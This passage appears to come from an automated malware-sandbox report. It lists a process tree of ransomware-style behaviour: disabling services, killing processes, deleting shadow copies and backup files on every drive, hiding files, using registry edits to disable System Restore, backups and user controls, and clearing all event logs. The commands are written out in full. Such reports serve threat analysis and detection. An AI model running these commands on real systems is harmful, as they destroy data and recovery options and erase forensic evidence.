- - C:\Windows\system32\sc.exe
    sc config SQLWriter start= disabled
    3⤵
    - Launches sc.exe
    PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled
  2⤵
  PID:1464
- - C:\Windows\system32\sc.exe
    sc config SstpSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F
  2⤵
  PID:2728
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F
  2⤵
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F
  2⤵
  PID:3548
- - C:\Windows\system32\taskkill.exe
    taskkill /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:1324
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  PID:2248
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:1248
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  PID:4488
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  PID:2480
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:1192
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:3340
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:4464
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:2360
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:4656
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:60
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:3520
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  PID:4556
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:3132
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win
  2⤵
  PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win
  2⤵
  PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win
  2⤵
  PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win
  2⤵
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win
  2⤵
  PID:2356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win
  2⤵
  PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del %0
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2
  2⤵
  PID:3816
- - C:\Windows\system32\attrib.exe
    attrib +h +s hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2
  2⤵
  PID:284
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\hrmlog2
    3⤵
    - Views/modifies file attributes
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:2460
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:768
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:3748
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:4328
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4840
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:4040
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1504
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:932
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:2496
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:4212
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:772
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:3996
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:3708
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:1944
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:1512
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:1488
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:4800
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:2980
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:624
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1612
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:5044
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:3832
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
  2⤵
  PID:4032
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:872
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4852
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
  2⤵
  PID:1152
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f
    3⤵
    PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:1324
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:3460
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:1248
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f
    3⤵
    PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:2928
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
    3⤵
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
  2⤵
  PID:2972
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f
    3⤵
    PID:488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
  2⤵
  PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:4016
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AMSI/Debug"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AirSpaceChannel"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3340
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    PID:2984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    PID:3676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "FirstUXPerf-Analytic"
    3⤵
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    - Clears Windows event logs
    PID:4380
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "General Logging"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:2724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "IHM_DebugChannel"
    3⤵
    PID:3760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    - Clears Windows event logs
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
    3⤵
    PID:4576
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    - Clears Windows event logs
    PID:2024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    - Clears Windows event logs
    PID:1276
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
    3⤵
    PID:1768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
    3⤵
    - Clears Windows event logs
    PID:4556
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    PID:344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    PID:1712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
    3⤵
    PID:544
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    - Clears Windows event logs
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationFrameServer"
    3⤵
    PID:2500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProc"
    3⤵
    PID:3452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProcD3D"
    3⤵
    - Clears Windows event logs
    PID:4604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationAsyncWrapper"
    3⤵
    PID:2812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationContentProtection"
    3⤵
    PID:4624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDS"
    3⤵
    - Clears Windows event logs
    PID:5012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    PID:268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMP4"
    3⤵
    PID:3816
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMediaEngine"
    3⤵
    PID:4536
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:284
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformanceCore"
    3⤵
    PID:3140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:4992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    - Clears Windows event logs
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationSrcPrefetch"
    3⤵
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
    3⤵
    PID:8
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Admin"
    3⤵
    PID:1764
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Debug"
    3⤵
    - Clears Windows event logs
    PID:740
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Operational"
    3⤵
    - Clears Windows event logs
    PID:5084
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
    3⤵
    - Clears Windows event logs
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
    3⤵
    PID:3392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
    3⤵
    PID:1784
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
    3⤵
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
    3⤵
    PID:3664
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:3696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:4088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
